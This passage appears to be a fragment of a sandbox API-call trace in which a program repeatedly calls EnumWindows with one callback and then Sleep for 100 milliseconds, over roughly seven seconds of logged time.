(dwMilliseconds=0x64) [0188.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.704] Sleep (dwMilliseconds=0x64) [0188.745] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.747] Sleep (dwMilliseconds=0x64) [0188.755] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.756] Sleep (dwMilliseconds=0x64) [0188.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.785] Sleep (dwMilliseconds=0x64) [0188.820] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.821] Sleep (dwMilliseconds=0x64) [0188.822] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.823] Sleep (dwMilliseconds=0x64) [0188.858] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.861] Sleep (dwMilliseconds=0x64) [0188.928] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.929] Sleep (dwMilliseconds=0x64) [0188.937] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.938] Sleep (dwMilliseconds=0x64) [0188.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.976] Sleep (dwMilliseconds=0x64) [0189.036] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.037] Sleep (dwMilliseconds=0x64) [0189.045] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.046] Sleep (dwMilliseconds=0x64) [0189.089] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.092] Sleep (dwMilliseconds=0x64) [0189.143] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.144] Sleep (dwMilliseconds=0x64) [0189.157] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.157] Sleep (dwMilliseconds=0x64) [0189.182] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.183] Sleep (dwMilliseconds=0x64) [0189.243] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.243] Sleep (dwMilliseconds=0x64) [0189.259] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.260] Sleep (dwMilliseconds=0x64) [0189.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.303] Sleep (dwMilliseconds=0x64) [0189.328] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.329] Sleep (dwMilliseconds=0x64) [0189.345] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.346] Sleep (dwMilliseconds=0x64) [0189.380] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.381] Sleep (dwMilliseconds=0x64) [0189.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.399] Sleep (dwMilliseconds=0x64) [0189.427] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.428] Sleep (dwMilliseconds=0x64) [0189.459] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.460] Sleep (dwMilliseconds=0x64) [0189.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.496] Sleep (dwMilliseconds=0x64) [0189.532] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.532] Sleep (dwMilliseconds=0x64) [0189.549] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.549] Sleep (dwMilliseconds=0x64) [0189.579] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.580] Sleep (dwMilliseconds=0x64) [0189.611] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.611] Sleep (dwMilliseconds=0x64) [0189.655] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.656] Sleep (dwMilliseconds=0x64) [0189.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.691] Sleep (dwMilliseconds=0x64) [0189.706] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.706] Sleep (dwMilliseconds=0x64) [0189.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.728] Sleep (dwMilliseconds=0x64) [0189.765] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.765] Sleep (dwMilliseconds=0x64) [0189.769] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.769] Sleep (dwMilliseconds=0x64) [0189.805] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.805] Sleep (dwMilliseconds=0x64) [0189.823] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.823] Sleep (dwMilliseconds=0x64) [0189.841] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.844] Sleep (dwMilliseconds=0x64) [0189.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.935] Sleep (dwMilliseconds=0x64) [0189.969] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.970] Sleep (dwMilliseconds=0x64) [0189.988] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0189.989] Sleep (dwMilliseconds=0x64) [0190.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.006] Sleep (dwMilliseconds=0x64) [0190.050] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.051] Sleep (dwMilliseconds=0x64) [0190.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.055] Sleep (dwMilliseconds=0x64) [0190.087] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.087] Sleep (dwMilliseconds=0x64) [0190.108] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.109] Sleep (dwMilliseconds=0x64) [0190.124] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.125] Sleep (dwMilliseconds=0x64) [0190.159] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.159] Sleep (dwMilliseconds=0x64) [0190.163] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.164] Sleep (dwMilliseconds=0x64) [0190.195] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.195] Sleep (dwMilliseconds=0x64) [0190.219] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.219] Sleep (dwMilliseconds=0x64) [0190.231] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.232] Sleep (dwMilliseconds=0x64) [0190.266] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.266] Sleep (dwMilliseconds=0x64) [0190.275] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.276] Sleep (dwMilliseconds=0x64) [0190.302] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.302] Sleep (dwMilliseconds=0x64) [0190.330] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.330] Sleep (dwMilliseconds=0x64) [0190.331] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.332] Sleep (dwMilliseconds=0x64) [0190.342] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.343] Sleep (dwMilliseconds=0x64) [0190.377] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.377] Sleep (dwMilliseconds=0x64) [0190.385] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.386] Sleep (dwMilliseconds=0x64) [0190.418] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.419] Sleep (dwMilliseconds=0x64) [0190.447] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.447] Sleep (dwMilliseconds=0x64) [0190.448] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.448] Sleep (dwMilliseconds=0x64) [0190.458] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.458] Sleep (dwMilliseconds=0x64) [0190.494] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.494] Sleep (dwMilliseconds=0x64) [0190.504] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.505] Sleep (dwMilliseconds=0x64) [0190.506] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.506] Sleep (dwMilliseconds=0x64) [0190.534] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.534] Sleep (dwMilliseconds=0x64) [0190.563] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.563] Sleep (dwMilliseconds=0x64) [0190.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.574] Sleep (dwMilliseconds=0x64) [0190.611] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.611] Sleep (dwMilliseconds=0x64) [0190.622] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.623] Sleep (dwMilliseconds=0x64) [0190.647] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.647] Sleep (dwMilliseconds=0x64) [0190.678] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.678] Sleep (dwMilliseconds=0x64) [0190.686] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.686] Sleep (dwMilliseconds=0x64) [0190.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.721] Sleep (dwMilliseconds=0x64) [0190.738] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.738] Sleep (dwMilliseconds=0x64) [0190.739] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.739] Sleep (dwMilliseconds=0x64) [0190.761] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.761] Sleep (dwMilliseconds=0x64) [0190.792] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.793] Sleep (dwMilliseconds=0x64) [0190.794] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.794] Sleep (dwMilliseconds=0x64) [0190.798] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.798] Sleep (dwMilliseconds=0x64) [0190.898] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.899] Sleep (dwMilliseconds=0x64) [0190.916] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.916] Sleep (dwMilliseconds=0x64) [0190.936] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.936] Sleep (dwMilliseconds=0x64) [0190.970] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.971] Sleep (dwMilliseconds=0x64) [0190.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0190.973] Sleep (dwMilliseconds=0x64) [0191.008] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.009] Sleep (dwMilliseconds=0x64) [0191.054] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.055] Sleep (dwMilliseconds=0x64) [0191.064] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.064] Sleep (dwMilliseconds=0x64) [0191.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.100] Sleep (dwMilliseconds=0x64) [0191.117] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.117] Sleep (dwMilliseconds=0x64) [0191.138] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.138] Sleep (dwMilliseconds=0x64) [0191.173] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.173] Sleep (dwMilliseconds=0x64) [0191.175] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.175] Sleep (dwMilliseconds=0x64) [0191.213] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.214] Sleep (dwMilliseconds=0x64) [0191.229] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.230] Sleep (dwMilliseconds=0x64) [0191.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.253] Sleep (dwMilliseconds=0x64) [0191.286] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.287] Sleep (dwMilliseconds=0x64) [0191.294] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.295] Sleep (dwMilliseconds=0x64) [0191.329] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.330] Sleep (dwMilliseconds=0x64) [0191.342] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.342] Sleep (dwMilliseconds=0x64) [0191.367] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.367] Sleep (dwMilliseconds=0x64) [0191.397] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.397] Sleep (dwMilliseconds=0x64) [0191.487] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.488] Sleep (dwMilliseconds=0x64) [0191.558] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.559] Sleep (dwMilliseconds=0x64) [0191.587] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.587] Sleep (dwMilliseconds=0x64) [0191.638] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.639] Sleep (dwMilliseconds=0x64) [0191.677] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.677] Sleep (dwMilliseconds=0x64) [0191.678] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.679] Sleep (dwMilliseconds=0x64) [0191.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.714] Sleep (dwMilliseconds=0x64) [0191.735] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.736] Sleep (dwMilliseconds=0x64) [0191.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.753] Sleep (dwMilliseconds=0x64) [0191.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.788] Sleep (dwMilliseconds=0x64) [0191.795] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.796] Sleep (dwMilliseconds=0x64) [0191.824] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.825] Sleep (dwMilliseconds=0x64) [0191.858] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.859] Sleep (dwMilliseconds=0x64) [0191.896] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.897] Sleep (dwMilliseconds=0x64) [0191.932] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.933] Sleep (dwMilliseconds=0x64) [0191.961] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.962] Sleep (dwMilliseconds=0x64) [0191.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0191.973] Sleep (dwMilliseconds=0x64) [0192.008] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.009] Sleep (dwMilliseconds=0x64) [0192.040] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.041] Sleep (dwMilliseconds=0x64) [0192.078] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.131] Sleep (dwMilliseconds=0x64) [0192.145] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.145] Sleep (dwMilliseconds=0x64) [0192.167] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.169] Sleep (dwMilliseconds=0x64) [0192.203] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.204] Sleep (dwMilliseconds=0x64) [0192.210] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.210] Sleep (dwMilliseconds=0x64) [0192.247] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.248] Sleep (dwMilliseconds=0x64) [0192.283] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.284] Sleep (dwMilliseconds=0x64) [0192.321] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.322] Sleep (dwMilliseconds=0x64) [0192.359] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.360] Sleep (dwMilliseconds=0x64) [0192.397] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.398] Sleep (dwMilliseconds=0x64) [0192.451] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.452] Sleep (dwMilliseconds=0x64) [0192.462] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.463] Sleep (dwMilliseconds=0x64) [0192.507] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.508] Sleep (dwMilliseconds=0x64) [0192.547] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.549] Sleep (dwMilliseconds=0x64) [0192.587] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.588] Sleep (dwMilliseconds=0x64) [0192.626] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.627] Sleep (dwMilliseconds=0x64) [0192.664] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.665] Sleep (dwMilliseconds=0x64) [0192.705] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.706] Sleep (dwMilliseconds=0x64) [0192.717] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.718] Sleep (dwMilliseconds=0x64) [0192.745] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.746] Sleep (dwMilliseconds=0x64) [0192.782] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.783] Sleep (dwMilliseconds=0x64) [0192.820] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.821] Sleep (dwMilliseconds=0x64) [0192.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.850] Sleep (dwMilliseconds=0x64) [0192.860] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.861] Sleep (dwMilliseconds=0x64) [0192.931] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.932] Sleep (dwMilliseconds=0x64) [0192.983] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.984] Sleep (dwMilliseconds=0x64) [0192.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0192.991] Sleep (dwMilliseconds=0x64) [0193.034] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.035] Sleep (dwMilliseconds=0x64) [0193.074] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.075] Sleep (dwMilliseconds=0x64) [0193.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.094] Sleep (dwMilliseconds=0x64) [0193.096] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.096] Sleep (dwMilliseconds=0x64) [0193.125] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.126] Sleep (dwMilliseconds=0x64) [0193.163] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.164] Sleep (dwMilliseconds=0x64) [0193.183] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.183] Sleep (dwMilliseconds=0x64) [0193.203] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.204] Sleep (dwMilliseconds=0x64) [0193.380] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.381] Sleep (dwMilliseconds=0x64) [0193.403] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.404] Sleep (dwMilliseconds=0x64) [0193.424] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.424] Sleep (dwMilliseconds=0x64) [0193.462] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.463] Sleep (dwMilliseconds=0x64) [0193.484] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.485] Sleep (dwMilliseconds=0x64) [0193.505] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.506] Sleep (dwMilliseconds=0x64) [0193.546] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.547] Sleep (dwMilliseconds=0x64) [0193.574] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.577] Sleep (dwMilliseconds=0x64) [0193.590] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.590] Sleep (dwMilliseconds=0x64) [0193.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.632] Sleep (dwMilliseconds=0x64) [0193.669] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.669] Sleep (dwMilliseconds=0x64) [0193.684] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.685] Sleep (dwMilliseconds=0x64) [0193.723] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.724] Sleep (dwMilliseconds=0x64) [0193.746] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.747] Sleep (dwMilliseconds=0x64) [0193.763] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.764] Sleep (dwMilliseconds=0x64) [0193.814] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.815] Sleep (dwMilliseconds=0x64) [0193.849] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.850] Sleep (dwMilliseconds=0x64) [0193.858] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.859] Sleep (dwMilliseconds=0x64) [0193.926] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.927] Sleep (dwMilliseconds=0x64) [0193.964] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0193.965] Sleep (dwMilliseconds=0x64) [0194.008] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.009] Sleep (dwMilliseconds=0x64) [0194.068] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.069] Sleep (dwMilliseconds=0x64) [0194.106] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.107] Sleep (dwMilliseconds=0x64) [0194.109] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.110] Sleep (dwMilliseconds=0x64) [0194.149] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.150] Sleep (dwMilliseconds=0x64) [0194.188] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.189] Sleep (dwMilliseconds=0x64) [0194.204] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.205] Sleep (dwMilliseconds=0x64) [0194.230] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.231] Sleep (dwMilliseconds=0x64) [0194.269] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.270] Sleep (dwMilliseconds=0x64) [0194.291] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.292] Sleep (dwMilliseconds=0x64) [0194.314] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.315] Sleep (dwMilliseconds=0x64) [0194.353] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.356] Sleep (dwMilliseconds=0x64) [0194.383] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.384] Sleep (dwMilliseconds=0x64) [0194.395] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.396] Sleep (dwMilliseconds=0x64) [0194.435] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.436] Sleep (dwMilliseconds=0x64) [0194.583] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.585] Sleep (dwMilliseconds=0x64) [0194.602] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.604] Sleep (dwMilliseconds=0x64) [0194.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.641] Sleep (dwMilliseconds=0x64) [0194.680] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.680] Sleep (dwMilliseconds=0x64) [0194.695] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.696] Sleep (dwMilliseconds=0x64) [0194.722] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.724] Sleep (dwMilliseconds=0x64) [0194.765] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.766] Sleep (dwMilliseconds=0x64) [0194.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.788] Sleep (dwMilliseconds=0x64) [0194.806] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.807] Sleep (dwMilliseconds=0x64) [0194.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.919] Sleep (dwMilliseconds=0x64) [0194.923] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.924] Sleep (dwMilliseconds=0x64) [0194.966] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0194.967] Sleep (dwMilliseconds=0x64) [0195.004] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.005] Sleep (dwMilliseconds=0x64) [0195.023] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.024] Sleep (dwMilliseconds=0x64) [0195.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.056] Sleep (dwMilliseconds=0x64) [0195.099] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.100] Sleep (dwMilliseconds=0x64) [0195.111] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.112] Sleep (dwMilliseconds=0x64) [0195.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.153] Sleep (dwMilliseconds=0x64) [0195.195] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.196] Sleep (dwMilliseconds=0x64) [0195.217] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.218] Sleep (dwMilliseconds=0x64) [0195.238] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.239] Sleep (dwMilliseconds=0x64) [0195.279] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.280] Sleep (dwMilliseconds=0x64) [0195.317] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.318] Sleep (dwMilliseconds=0x64) [0195.320] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.320] Sleep (dwMilliseconds=0x64) [0195.356] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.357] Sleep (dwMilliseconds=0x64) [0195.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.395] Sleep (dwMilliseconds=0x64) [0195.399] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.400] Sleep (dwMilliseconds=0x64) [0195.432] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.433] Sleep (dwMilliseconds=0x64) [0195.470] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.471] Sleep (dwMilliseconds=0x64) [0195.512] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.513] Sleep (dwMilliseconds=0x64) [0195.542] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.543] Sleep (dwMilliseconds=0x64) [0195.585] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.586] Sleep (dwMilliseconds=0x64) [0195.606] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.607] Sleep (dwMilliseconds=0x64) [0195.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.626] Sleep (dwMilliseconds=0x64) [0195.663] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.663] Sleep (dwMilliseconds=0x64) [0195.680] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.681] Sleep (dwMilliseconds=0x64) [0195.740] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.740] Sleep (dwMilliseconds=0x64) [0195.778] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.778] Sleep (dwMilliseconds=0x64) [0195.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.786] Sleep (dwMilliseconds=0x64) [0195.817] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.930] Sleep (dwMilliseconds=0x64) [0195.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.936] Sleep (dwMilliseconds=0x64) [0195.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0195.973] Sleep (dwMilliseconds=0x64) [0196.005] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.006] Sleep (dwMilliseconds=0x64) [0196.022] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.023] Sleep (dwMilliseconds=0x64) [0196.061] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.062] Sleep (dwMilliseconds=0x64) [0196.091] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.092] Sleep (dwMilliseconds=0x64) [0196.099] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.100] Sleep (dwMilliseconds=0x64) [0196.137] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) 